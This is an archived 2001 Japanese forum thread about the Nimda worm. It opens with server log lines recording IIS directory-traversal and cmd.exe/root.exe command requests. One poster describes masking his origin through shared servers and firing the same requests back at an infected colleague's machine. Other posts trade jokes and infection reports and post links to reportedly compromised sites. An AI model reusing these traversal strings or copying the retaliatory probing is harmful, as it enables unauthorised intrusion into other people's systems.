xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:05 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:05 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:09 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
・・・・・・・・・・

・・・誰だ、俺のPCを攻撃してる奴ァ!!!
ってNimdaかい、このパターンは。
xx.xxx.xx.xxx をトレースすると社内。
あ・れ・ほ・ど小うるさくセキュリティ強化されて
こっちはとばっちり食らってるっーのに、まぁだ
感染する奴がいるのか。
あんまり腹が立ったので、こっそりと別の共用サーバ
とかはしごして足跡ごまかし(姑息)てから TELNETで
"GET /scripts/root.exe?/c+dir HTTP/1.0"
とか一通りぶち込んで差し上げました。

さて、そんなことすっきりと忘れた今日、一通のメール。
「×××××(共用サーバ)がウィルスに感染しました。」
あわわわわ、共用サーバってWindowsでもUNIXでもない上に
LANの中だけのマシンだから「ウィルスに感染」するわきゃ
無いんですね、これが。

そんなわけで、ウィルスになったワタシ。
「感染源」は特定されなかったようです(笑
167名無し~3.EXE:01/10/18 19:51
IEのステータスバーが水色になったんだけどこれってNimdaなの?
既出そうでスマンがNimda感染の症状教えてくり。
168名無し~3.EXE:01/10/19 13:45
>>167

おおざっぱにいうと、自覚症状はない。
他覚症状はあるようだが。
169名無し~3.EXE:01/10/20 17:12
浮気相手にニムダうつします

http://www.interq.or.jp/yellow/merits/main.htm
170名無し~3.EXE:01/10/20 17:21
ドットを含まないIPアドレスを含むURLの処理など、IEに影響を及ぼす3つの脆弱性を排除する英語版プログラムをリリース(マイクロソフト)(2001.10.18)

 マイクロソフト株式会社は、ドットを含まないIPアドレスを含むURLの処理など、IEに影響を及ぼす3つの脆弱性を排除するプログラムをリリースした。対象となるのは、IE 5.01SP2、IE 5.5SP2およびIE 6で、日本語版プログラムもダウンロード可能。

http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-051
171 :01/10/20 17:38
N I M D A

Mをとると

N I D A

ニダ

はてさてMはなにを意味しておるのか
はてさてふむ〜〜
172名無し~3.EXE:01/10/20 18:15
>>171
キムのム
173名無し~3.EXE:01/10/20 19:14
L U N C H
Lを取ると

U N C H

はてさてUNCHはなにを意味しておるのか
はてさてふむ〜〜
174名無し~3.EXE:01/10/23 15:48
175名無し~3.EXE:01/10/23 15:58
>>173
L だけ体内で消化される、という認識でよろしいか?
176名無し~3.EXE:01/10/23 17:26
>>175がいまいいこといった!
177名無し~3.EXE:01/10/23 19:33
178名無し~3.EXE:01/10/23 19:38
やられちゃいました。

http://www.bnetx.com/okazawa/
179名無し~3.EXE:01/10/23 22:24
おいおい、また閉鎖かよ?

http://www.hyundaijapan.co.jp/
180名無し~3.EXE:01/10/23 22:32
OS入れ替えるたので(ME→2000)Parlをインストールしたら
ニムダにやられてた・・・また入れ直しです(涙
181名無し~3.EXE:01/10/24 13:27
やられちゃいました。

http://210.83.127.121
182名無し~3.EXE:01/10/25 09:57
競馬で当ててニムダに感染しよう!

http://www.keibainet.com/profile/main_1.asp
183名無し~3.EXE:01/10/25 10:00
ニムダには感染できるが、競馬はちがってた。失敬m(_ _)m
184名無し~3.EXE:01/10/25 14:55
185名無し~3.EXE:01/10/25 15:39
やられちゃいました・・。

http://www.penki.co.jp/
186名無し~3.EXE:01/10/26 10:28
187名無し~3.EXE:01/10/26 11:17
>>173
ウンチ?
188よしなさいって!!
よしなさいって!!